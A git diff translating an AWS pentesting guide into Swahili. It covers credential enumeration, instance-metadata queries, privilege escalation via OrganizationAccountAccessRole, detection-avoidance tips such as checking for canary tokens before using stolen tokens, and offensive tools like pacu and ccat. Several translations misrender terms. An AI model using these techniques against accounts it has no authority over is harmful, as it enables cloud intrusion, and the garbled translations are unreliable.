+Au ikiwa unafanya **kaguzi** unaweza tu **kuomba akili** na hizi nafasi:
{{#ref}}
aws-permissions-for-a-pentest.md
{{#endref}}
> [!NOTE]
-> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
+> Baada ya kufanikiwa kupata akili, unahitaji kujua **ni nani mwenye akili hizo**, na **nini wana ufikiaji wa**, hivyo unahitaji kufanya uainishaji wa msingi:
## Basic Enumeration
### SSRF
-If you found a SSRF in a machine inside AWS check this page for tricks:
+Ikiwa umepata SSRF katika mashine ndani ya AWS angalia ukurasa huu kwa mbinu:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
@@ -72,8 +72,7 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou
### Whoami
-One of the first things you need to know is who you are (in where account you are in other info about the AWS env):
-
+Moja ya mambo ya kwanza unahitaji kujua ni wewe ni nani (katika akaunti gani ulipo na habari nyingine kuhusu mazingira ya AWS):
```bash
# Easiest way, but might be monitored?
aws sts get-caller-identity
@@ -89,10 +88,9 @@ aws sns publish --topic-arn arn:aws:sns:us-east-1:*account id*:aaa --message aaa
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document
```
-
> [!CAUTION]
-> Note that companies might use **canary tokens** to identify when **tokens are being stolen and used**. It's recommended to check if a token is a canary token or not before using it.\
-> For more info [**check this page**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass).
+> Kumbuka kwamba kampuni zinaweza kutumia **canary tokens** kubaini wakati **tokens zinapokuwa zikiibiwa na kutumika**. Inapendekezwa kuangalia kama token ni canary token au la kabla ya kuitumia.\
+> Kwa maelezo zaidi [**angalia ukurasa huu**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass).
### Org Enumeration
@@ -102,30 +100,30 @@ aws-services/aws-organizations-enum.md
### IAM Enumeration
-If you have enough permissions **checking the privileges of each entity inside the AWS account** will help you understand what you and other identities can do and how to **escalate privileges**.
+Ikiwa una ruhusa za kutosha **kuangalia haki za kila chombo ndani ya akaunti ya AWS** itakusaidia kuelewa ni nini unaweza kufanya na vitambulisho vingine na jinsi ya **kuinua haki**.
-If you don't have enough permissions to enumerate IAM, you can **steal bruteforce them** to figure them out.\
-Check **how to do the numeration and brute-forcing** in:
+Ikiwa huna ruhusa za kutosha kuhesabu IAM, unaweza **kuiba kuzitafutia** ili kujua.\
+Angalia **jinsi ya kufanya hesabu na brute-forcing** katika:
{{#ref}}
aws-services/aws-iam-enum.md
{{#endref}}
> [!NOTE]
-> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
-> In the following section you can check some ways to **enumerate some common services.**
+> Sasa kwamba **una taarifa fulani kuhusu hati zako** (na ikiwa wewe ni timu nyekundu matumaini huja **gundulika**). Ni wakati wa kubaini ni huduma zipi zinazotumika katika mazingira.\
+> Katika sehemu ifuatayo unaweza kuangalia njia kadhaa za **kuhesabu huduma za kawaida.**
## Services Enumeration, Post-Exploitation & Persistence
-AWS has an astonishing amount of services, in the following page you will find **basic information, enumeration** cheatsheets\*\*,\*\* how to **avoid detection**, obtain **persistence**, and other **post-exploitation** tricks about some of them:
+AWS ina idadi kubwa ya huduma, katika ukurasa ufuatao utapata **taarifa za msingi, hesabu** cheatsheets\*\*,\*\* jinsi ya **kuepuka kugundulika**, kupata **kuendelea**, na hila nyingine za **post-exploitation** kuhusu baadhi yao:
{{#ref}}
aws-services/
{{#endref}}
-Note that you **don't** need to perform all the work **manually**, below in this post you can find a **section about** [**automatic tools**](./#automated-tools).
+Kumbuka kwamba **huhitaji** kufanya kazi yote **kwa mikono**, hapa chini katika chapisho hili unaweza kupata **sehemu kuhusu** [**zana za kiotomatiki**](./#automated-tools).
-Moreover, in this stage you might discovered **more services exposed to unauthenticated users,** you might be able to exploit them:
+Zaidi ya hayo, katika hatua hii unaweza kugundua **huduma zaidi zilizofichuliwa kwa watumiaji wasio na uthibitisho,** unaweza kuwa na uwezo wa kuzitumia:
{{#ref}}
aws-unauthenticated-enum-access/
@@ -133,7 +131,7 @@ aws-unauthenticated-enum-access/
## Privilege Escalation
-If you can **check at least your own permissions** over different resources you could **check if you are able to obtain further permissions**. You should focus at least in the permissions indicated in:
+Ikiwa unaweza **kuangalia angalau ruhusa zako mwenyewe** juu ya rasilimali tofauti unaweza **kuangalia ikiwa unaweza kupata ruhusa zaidi**. Unapaswa kuzingatia angalau ruhusa zilizoonyeshwa katika:
{{#ref}}
aws-privilege-escalation/
@@ -141,10 +139,10 @@ aws-privilege-escalation/
## Publicly Exposed Services
-While enumerating AWS services you might have found some of them **exposing elements to the Internet** (VM/Containers ports, databases or queue services, snapshots or buckets...).\
-As pentester/red teamer you should always check if you can find **sensitive information / vulnerabilities** on them as they might provide you **further access into the AWS account**.
+Wakati wa kuhesabu huduma za AWS unaweza kuwa umepata baadhi yao **zinazoonyesha vitu kwenye Mtandao** (VM/Containers ports, databases au queue services, snapshots au buckets...).\
+Kama pentester/timu nyekundu unapaswa kila wakati kuangalia ikiwa unaweza kupata **taarifa nyeti / udhaifu** juu yao kwani zinaweza kukupa **ufikiaji zaidi kwenye akaunti ya AWS**.
-In this book you should find **information** about how to find **exposed AWS services and how to check them**. About how to find **vulnerabilities in exposed network services** I would recommend you to **search** for the specific **service** in:
+Katika kitabu hiki unapaswa kupata **taarifa** kuhusu jinsi ya kupata **huduma za AWS zilizofichuliwa na jinsi ya kuziangalia**. Kuhusu jinsi ya kupata **udhaifu katika huduma za mtandao zilizofichuliwa** ningependekeza **utafute** huduma maalum katika:
{{#ref}}
https://book.hacktricks.xyz/
@@ -154,52 +152,49 @@ https://book.hacktricks.xyz/
### From the root/management account
-When the management account creates new accounts in the organization, a **new role** is created in the new account, by default named **`OrganizationAccountAccessRole`** and giving **AdministratorAccess** policy to the **management account** to access the new account.
+Wakati akaunti ya usimamizi inaunda akaunti mpya katika shirika, **jukumu jipya** linaundwa katika akaunti mpya, kwa default inaitwa **`OrganizationAccountAccessRole`** na kutoa sera ya **AdministratorAccess** kwa **akaunti ya usimamizi** ili kufikia akaunti mpya.
-So, in order to access as administrator a child account you need:
+Hivyo, ili kufikia kama msimamizi akaunti ya mtoto unahitaji:
-- **Compromise** the **management** account and find the **ID** of the **children accounts** and the **names** of the **role** (OrganizationAccountAccessRole by default) allowing the management account to access as admin.
- - To find children accounts go to the organizations section in the aws console or run `aws organizations list-accounts`
- - You cannot find the name of the roles directly, so check all the custom IAM policies and search any allowing **`sts:AssumeRole` over the previously discovered children accounts**.
-- **Compromise** a **principal** in the management account with **`sts:AssumeRole` permission over the role in the children accounts** (even if the account is allowing anyone from the management account to impersonate, as its an external account, specific `sts:AssumeRole` permissions are necessary).
+- **Kuvunja** akaunti ya **usimamizi** na kupata **ID** ya **akaunti za watoto** na **majina** ya **jukumu** (OrganizationAccountAccessRole kwa default) inayoruhusu akaunti ya usimamizi kufikia kama msimamizi.
+- Ili kupata akaunti za watoto nenda kwenye sehemu ya mashirika katika console ya aws au endesha `aws organizations list-accounts`
+- Huwezi kupata jina la majukumu moja kwa moja, hivyo angalia sera zote za kawaida za IAM na tafuta yoyote inayoruhusu **`sts:AssumeRole` juu ya akaunti za watoto zilizogunduliwa awali**.
+- **Kuvunja** **mwanachama** katika akaunti ya usimamizi na **`sts:AssumeRole` ruhusa juu ya jukumu katika akaunti za watoto** (hata kama akaunti inaruhusu mtu yeyote kutoka akaunti ya usimamizi kujiwakilisha, kama ni akaunti ya nje, ruhusa maalum za `sts:AssumeRole` zinahitajika).
## Automated Tools
### Recon
-- [**aws-recon**](https://github.com/darkbitio/aws-recon): A multi-threaded AWS security-focused **inventory collection tool** written in Ruby.
-
+- [**aws-recon**](https://github.com/darkbitio/aws-recon): Zana ya **kukusanya hesabu** inayolenga usalama wa AWS iliyoandikwa kwa Ruby.
```bash
# Install
gem install aws_recon
# Recon and get json
AWS_PROFILE= aws_recon \
- --services S3,EC2 \
- --regions global,us-east-1,us-east-2 \
- --verbose
+--services S3,EC2 \
+--regions global,us-east-1,us-east-2 \
+--verbose
```
-
-- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers.
-- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper helps you analyze your Amazon Web Services (AWS) environments. It now contains much more functionality, including auditing for security issues.
-
+- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist ni **chombo cha multi-cloud kwa kupata Mali** (Majina ya Kikoa, Anwani za IP) kutoka kwa Watoa Huduma za Cloud.
+- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper inakusaidia kuchambua mazingira yako ya Amazon Web Services (AWS). Sasa ina kazi nyingi zaidi, ikiwa ni pamoja na ukaguzi wa masuala ya usalama.
```bash
# Installation steps in github
# Create a config.json file with the aws info, like:
{
- "accounts": [
- {
- "default": true,
- "id": "",
- "name": "dev"
- }
- ],
- "cidrs":
- {
- "2.2.2.2/28": {"name": "NY Office"}
- }
+"accounts": [
+{
+"default": true,
+"id": "",
+"name": "dev"
+}
+],
+"cidrs":
+{
+"2.2.2.2/28": {"name": "NY Office"}
+}
}
# Enumerate
@@ -229,9 +224,7 @@ python3 cloudmapper.py public --accounts dev
python cloudmapper.py prepare #Prepare webserver
python cloudmapper.py webserver #Show webserver
```
-
-- [**cartography**](https://github.com/lyft/cartography): Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.
-
+- [**cartography**](https://github.com/lyft/cartography): Cartography ni chombo cha Python kinachounganisha mali za miundombinu na uhusiano kati yao katika mtazamo wa grafu wa kueleweka unaoendeshwa na hifadhidata ya Neo4j.
```bash
# Install
pip install cartography
@@ -240,17 +233,15 @@ pip install cartography
# Get AWS info
AWS_PROFILE=dev cartography --neo4j-uri bolt://127.0.0.1:7687 --neo4j-password-prompt --neo4j-user neo4j
```
-
-- [**starbase**](https://github.com/JupiterOne/starbase): Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database.
-- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Uses python2) This is a tool that tries to **discover all** [**AWS resources**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) created in an account.
-- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): It's a tool to **fetch all public IP addresses** (both IPv4/IPv6) associated with an AWS account.
+- [**starbase**](https://github.com/JupiterOne/starbase): Starbase inakusanya mali na uhusiano kutoka kwa huduma na mifumo ikiwa ni pamoja na miundombinu ya wingu, programu za SaaS, udhibiti wa usalama, na zaidi katika mtazamo wa grafu unaoeleweka unaoungwa mkono na hifadhidata ya Neo4j.
+- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Inatumia python2) Hii ni zana inayojaribu **kuvumbua yote** [**rasilimali za AWS**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) zilizoundwa katika akaunti.
+- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): Ni zana ya **kupata anwani zote za IP za umma** (zote IPv4/IPv6) zinazohusishwa na akaunti ya AWS.
### Privesc & Exploiting
-- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins. It uses powershell. You can find the **definition of privileged policies** in the function **`Check-PrivilegedPolicy`** in [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1).
-- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu is an open-source **AWS exploitation framework**, designed for offensive security testing against cloud environments. It can **enumerate**, find **miss-configurations** and **exploit** them. You can find the **definition of privileged permissions** in [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) inside the **`user_escalation_methods`** dict.
- - Note that pacu **only checks your own privescs paths** (not account wide).
-
+- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Gundua watumiaji wenye mamlaka zaidi katika mazingira ya AWS yaliyoskanwa, ikiwa ni pamoja na AWS Shadow Admins. Inatumia powershell. Unaweza kupata **ufafanuzi wa sera zenye mamlaka** katika kazi **`Check-PrivilegedPolicy`** katika [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1).
+- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu ni **mfumo wa unyakuzi wa AWS** wa chanzo wazi, ulioandaliwa kwa ajili ya majaribio ya usalama wa kukabili dhidi ya mazingira ya wingu. Inaweza **kuorodhesha**, kupata **makosa ya usanidi** na **kuyatumia**. Unaweza kupata **ufafanuzi wa ruhusa zenye mamlaka** katika [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) ndani ya kamusi ya **`user_escalation_methods`**.
+- Kumbuka kwamba pacu **inaangalia tu njia zako za privesc** (sio kwa akaunti nzima).
```bash
# Install
## Feel free to use venvs
@@ -264,9 +255,7 @@ pacu
> exec iam__enum_permissions # Get permissions
> exec iam__privesc_scan # List privileged permissions
```
-
-- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) is a script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an account as a directed graph, which enables checks for **privilege escalation** and for alternate paths an attacker could take to gain access to a resource or action in AWS. You can check the **permissions used to find privesc** paths in the filenames ended in `_edges.py` in [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing)
-
+- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) ni script na maktaba ya kutambua hatari katika usanidi wa AWS Identity and Access Management (IAM) kwa akaunti ya AWS au shirika la AWS. Inatengeneza mfano wa Watumiaji wa IAM na Majukumu katika akaunti kama grafu iliyoelekezwa, ambayo inaruhusu ukaguzi wa **kuinua mamlaka** na njia mbadala ambazo mshambuliaji anaweza kuchukua ili kupata ufikiaji wa rasilimali au hatua katika AWS. Unaweza kuangalia **permissions used to find privesc** paths katika majina ya faili yanayomalizika na `_edges.py` katika [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing)
```bash
# Install
pip install principalmapper
@@ -288,10 +277,8 @@ pmapper --profile dev query 'preset privesc *' # Get privescs with admins
pmapper --profile dev orgs create
pmapper --profile dev orgs display
```
-
-- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized HTML report.\
- It will show you potentially **over privileged** customer, inline and aws **policies** and which **principals has access to them**. (It not only checks for privesc but also other kind of interesting permissions, recommended to use).
-
+- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining ni chombo cha Tathmini ya Usalama wa AWS IAM ambacho kinatambua ukiukaji wa haki ndogo na kuzalisha ripoti ya HTML iliyo na kipaumbele cha hatari.\
+Itakuonyesha wateja wanaoweza kuwa **na haki nyingi**, sera za inline na aws **na ni nani **wanachama wanaoingia** kwao. (Haki hizi hazichunguzwi tu kwa privesc bali pia aina nyingine za ruhusa za kuvutia, inapendekezwa kutumika).
```bash
# Install
pip install cloudsplaining
@@ -303,24 +290,20 @@ cloudsplaining download --profile dev
# Analyze the IAM policies
cloudsplaining scan --input-file /private/tmp/cloudsplaining/dev.json --output /tmp/files/
```
-
-- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack assesses AWS accounts for **subdomain hijacking vulnerabilities** as a result of decoupled Route53 and CloudFront configurations.
-- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): List ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image
-- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag is a tool that **searches** through public Elastic Block Storage (**EBS) snapshots for secrets** that may have been accidentally left in.
+- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack inakadiria akaunti za AWS kwa **udhaifu wa hijacking wa subdomain** kutokana na usanidi wa Route53 na CloudFront ambao haujashikamana.
+- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): Orodha ya ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image
+- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag ni chombo ambacho **kinatafuta** kupitia picha za umma za Elastic Block Storage (**EBS**) kwa siri ambazo zinaweza kuwa ziachwa kwa bahati mbaya.
### Audit
-- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit by Aqua is an open-source project designed to allow detection of **security risks in cloud infrastructure** accounts, including: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub (It doesn't look for ShadowAdmins).
-
+- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit na Aqua ni mradi wa chanzo wazi ulioandaliwa kuruhusu kugundua **hatari za usalama katika akaunti za miundombinu ya wingu**, ikiwa ni pamoja na: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), na GitHub (Haifanyi utafutaji wa ShadowAdmins).
```bash
./index.js --csv=file.csv --console=table --config ./config.js
# Compiance options: --compliance {hipaa,cis,cis1,cis2,pci}
## use "cis" for cis level 1 and 2
```
-
-- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler is an Open Source security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness.
-
+- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler ni chombo cha usalama cha Open Source kufanya tathmini za mbinu bora za usalama za AWS, ukaguzi, majibu ya matukio, ufuatiliaji endelevu, kuimarisha na maandalizi ya forensics.
```bash
# Install python3, jq and git
# Install
@@ -331,15 +314,11 @@ prowler -v
prowler
prowler aws --profile custom-profile [-M csv json json-asff html]
```
-
-- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox helps you gain situational awareness in unfamiliar cloud environments. Itās an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.
-
+- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox inakusaidia kupata ufahamu wa hali katika mazingira ya wingu yasiyojulikana. Ni zana ya mstari wa amri ya chanzo wazi iliyoundwa kusaidia wapenyezi na wataalamu wengine wa usalama wa kukabili kupata njia za shambulio zinazoweza kutumika katika miundombinu ya wingu.
```bash
cloudfox aws --profile [profile-name] all-checks
```
-
-- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments.
-
+- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite ni chombo cha ukaguzi wa usalama wa multi-cloud kilicho wazi, ambacho kinawawezesha kutathmini hali ya usalama ya mazingira ya wingu.
```bash
# Install
virtualenv -p python3 venv
@@ -350,18 +329,16 @@ scout --help
# Get info
scout aws -p dev
```
+- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (inatumia python2.7 na inaonekana haijatunzwa)
+- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus ni chombo chenye nguvu kwa AWS EC2 / S3 / CloudTrail / CloudWatch / KMS mbinu bora za kuimarisha (inaonekana haijatunzwa). Inakagua tu akauti zilizowekwa kwa chaguo-msingi ndani ya mfumo.
-- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (uses python2.7 and looks unmaintained)
-- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus is a powerful tool for AWS EC2 / S3 / CloudTrail / CloudWatch / KMS best hardening practices (looks unmaintained). It checks only default configured creds inside the system.
+### Ukaguzi wa Kudumu
-### Constant Audit
-
-- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users to **define policies to enable a well managed cloud infrastructure**, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting.
-- [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** is a platform for **continuous compliance monitoring, compliance reporting and security automation for the clou**d. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot **auto-fix** framework provides the ability to automatically respond to policy violations by taking predefined actions.
-- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert is a serverless, **real-time** data analysis framework which empowers you to **ingest, analyze, and alert** on data from any environment, u**sing data sources and alerting logic you define**. Computer security teams use StreamAlert to scan terabytes of log data every day for incident detection and response.
+- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian ni injini ya sheria kwa usimamizi wa akaunti na rasilimali za umma za wingu. Inawaruhusu watumiaji **kufafanua sera za kuwezesha miundombinu ya wingu inayosimamiwa vizuri**, ambayo ni salama na imeboreshwa kwa gharama. Inakusanya scripts nyingi za adhoc ambazo mashirika yana nazo kuwa chombo chepesi na chenye kubadilika, chenye vipimo na ripoti zilizounganishwa.
+- [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** ni jukwaa la **ufuatiliaji wa kuendelea wa utii, ripoti za utii na automatisering ya usalama kwa wingu**. Katika PacBot, sera za usalama na utii zinawekwa kama msimbo. Rasilimali zote zinazogunduliwa na PacBot zinakaguliwa dhidi ya sera hizi ili kupima utii wa sera. Mfumo wa **auto-fix** wa PacBot unatoa uwezo wa kujibu moja kwa moja kwa ukiukaji wa sera kwa kuchukua hatua zilizowekwa awali.
+- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert ni mfumo wa uchambuzi wa data wa **wakati halisi** usio na seva ambao unakupa uwezo wa **kuingiza, kuchambua, na kutoa tahadhari** kuhusu data kutoka mazingira yoyote, **ukitumia vyanzo vya data na mantiki ya tahadhari unayofafanua**. Timu za usalama wa kompyuta zinatumia StreamAlert kuchanganua terabytes za data za kumbukumbu kila siku kwa ajili ya kugundua na kujibu matukio.
## DEBUG: Capture AWS cli requests
-
```bash
# Set proxy
export HTTP_PROXY=http://localhost:8080
@@ -380,14 +357,9 @@ export AWS_CA_BUNDLE=~/Downloads/certificate.pem
# Run aws cli normally trusting burp cert
aws ...
```
-
-## References
+## Marejeleo
- [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
- [https://cloudsecdocs.com/aws/defensive/tooling/audit/](https://cloudsecdocs.com/aws/defensive/tooling/audit/)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-basic-information/README.md b/src/pentesting-cloud/aws-security/aws-basic-information/README.md
index 02e6e7729..f69207295 100644
--- a/src/pentesting-cloud/aws-security/aws-basic-information/README.md
+++ b/src/pentesting-cloud/aws-security/aws-basic-information/README.md
@@ -1,84 +1,78 @@
-# AWS - Basic Information
+# AWS - Taarifa za Msingi
{{#include ../../../banners/hacktricks-training.md}}
-## Organization Hierarchy
+## Hierarchi ya Shirika
.png>)
-### Accounts
+### Akaunti
-In AWS there is a **root account,** which is the **parent container for all the accounts** for your **organization**. However, you don't need to use that account to deploy resources, you can create **other accounts to separate different AWS** infrastructures between them.
+Katika AWS kuna **akaunti ya mzizi,** ambayo ni **konteina ya mzazi kwa akaunti zote** za **shirika** lako. Hata hivyo, huwezi kutumia akaunti hiyo kupeleka rasilimali, unaweza kuunda **akaunti nyingine ili kutenganisha miundombinu tofauti za AWS** kati yao.
-This is very interesting from a **security** point of view, as **one account won't be able to access resources from other account** (except bridges are specifically created), so this way you can create boundaries between deployments.
+Hii ni ya kuvutia kutoka kwa mtazamo wa **usalama**, kwani **akaunti moja haitakuwa na uwezo wa kufikia rasilimali kutoka akaunti nyingine** (isipokuwa madaraja yameundwa mahsusi), hivyo unaweza kuunda mipaka kati ya matumizi.
-Therefore, there are **two types of accounts in an organization** (we are talking about AWS accounts and not User accounts): a single account that is designated as the management account, and one or more member accounts.
+Kwa hiyo, kuna **aina mbili za akaunti katika shirika** (tunazungumzia akaunti za AWS na si Akaunti za Mtumiaji): akaunti moja ambayo imewekwa kama akaunti ya usimamizi, na akaunti moja au zaidi za wanachama.
-- The **management account (the root account)** is the account that you use to create the organization. From the organization's management account, you can do the following:
+- **Akaunti ya usimamizi (akaunti ya mzizi)** ndiyo akaunti unayotumia kuunda shirika. Kutoka kwa akaunti ya usimamizi ya shirika, unaweza kufanya yafuatayo:
- - Create accounts in the organization
- - Invite other existing accounts to the organization
- - Remove accounts from the organization
- - Manage invitations
- - Apply policies to entities (roots, OUs, or accounts) within the organization
- - Enable integration with supported AWS services to provide service functionality across all of the accounts in the organization.
- - It's possible to login as the root user using the email and password used to create this root account/organization.
+- Kuunda akaunti katika shirika
+- Kualika akaunti nyingine zilizopo katika shirika
+- Kuondoa akaunti kutoka shirika
+- Kudhibiti mialiko
+- Kutumia sera kwa vitu (mizizi, OUs, au akaunti) ndani ya shirika
+- Kuwezesha ujumuishaji na huduma za AWS zinazoungwa mkono ili kutoa kazi za huduma katika akaunti zote za shirika.
+- Inawezekana kuingia kama mtumiaji wa mzizi kwa kutumia barua pepe na nenosiri vilivyotumika kuunda akaunti hii ya mzizi/shirika.
- The management account has the **responsibilities of a payer account** and is responsible for paying all charges that are accrued by the member accounts. You can't change an organization's management account.
-
-- **Member accounts** make up all of the rest of the accounts in an organization. An account can be a member of only one organization at a time. You can attach a policy to an account to apply controls to only that one account.
- - Member accounts **must use a valid email address** and can have a **name**, in general they wont be able to manage the billing (but they might be given access to it).
+Akaunti ya usimamizi ina **majukumu ya akaunti ya kulipa** na inawajibika kwa kulipa malipo yote yanayokusanywa na akaunti za wanachama. Huwezi kubadilisha akaunti ya usimamizi ya shirika.
+- **Akaunti za wanachama** zinaunda akaunti zote nyingine katika shirika. Akaunti inaweza kuwa mwanachama wa shirika moja tu kwa wakati mmoja. Unaweza kuambatisha sera kwa akaunti ili kuweka udhibiti kwa akaunti hiyo pekee.
+- Akaunti za wanachama **zinapaswa kutumia anwani halali ya barua pepe** na zinaweza kuwa na **jina**, kwa ujumla hawawezi kudhibiti bili (lakini wanaweza kupewa ufikiaji wa hiyo).
```
aws organizations create-account --account-name testingaccount --email testingaccount@lalala1233fr.com
```
+### **Vitengo vya Shirika**
-### **Organization Units**
-
-Accounts can be grouped in **Organization Units (OU)**. This way, you can create **policies** for the Organization Unit that are going to be **applied to all the children accounts**. Note that an OU can have other OUs as children.
-
+Akaunti zinaweza kuunganishwa katika **Vitengo vya Shirika (OU)**. Kwa njia hii, unaweza kuunda **sera** za Vitengo vya Shirika ambazo zita **wekwa kwenye akaunti zote za watoto**. Kumbuka kwamba OU inaweza kuwa na OUs zingine kama watoto.
```bash
# You can get the root id from aws organizations list-roots
aws organizations create-organizational-unit --parent-id r-lalala --name TestOU
```
-
### Service Control Policy (SCP)
-A **service control policy (SCP)** is a policy that specifies the services and actions that users and roles can use in the accounts that the SCP affects. SCPs are **similar to IAM** permissions policies except that they **don't grant any permissions**. Instead, SCPs specify the **maximum permissions** for an organization, organizational unit (OU), or account. When you attach a SCP to your organization root or an OU, the **SCP limits permissions for entities in member accounts**.
+A **service control policy (SCP)** ni sera inayobainisha huduma na vitendo ambavyo watumiaji na majukumu wanaweza kutumia katika akaunti ambazo SCP inahusisha. SCPs ni **sawa na sera za ruhusa za IAM** isipokuwa kwamba **hazitoi ruhusa yoyote**. Badala yake, SCPs zinaelezea **ruhusa za juu zaidi** kwa shirika, kitengo cha shirika (OU), au akaunti. Unapounganisha SCP na mzizi wa shirika lako au OU, **SCP inakandamiza ruhusa za viumbe katika akaunti za wanachama**.
-This is the ONLY way that **even the root user can be stopped** from doing something. For example, it could be used to stop users from disabling CloudTrail or deleting backups.\
-The only way to bypass this is to compromise also the **master account** that configures the SCPs (master account cannot be blocked).
+Hii ndiyo NJIA PEKEE ambayo **hata mtumiaji wa mzizi anaweza kuzuiwa** kufanya kitu. Kwa mfano, inaweza kutumika kuzuia watumiaji wasizime CloudTrail au kufuta nakala za akiba.\
+Njia pekee ya kupita hii ni kuathiri pia **akaunti ya mkuu** inayoweka mipangilio ya SCPs (akaunti ya mkuu haiwezi kuzuiwa).
> [!WARNING]
-> Note that **SCPs only restrict the principals in the account**, so other accounts are not affected. This means having an SCP deny `s3:GetObject` will not stop people from **accessing a public S3 bucket** in your account.
+> Kumbuka kwamba **SCPs zinakandamiza tu wakuu katika akaunti**, hivyo akaunti nyingine hazihusiki. Hii inamaanisha kuwa kuwa na SCP inayokataza `s3:GetObject` haitazuia watu **kupata mfuko wa S3 wa umma** katika akaunti yako.
-SCP examples:
+SCP mifano:
-- Deny the root account entirely
-- Only allow specific regions
-- Only allow white-listed services
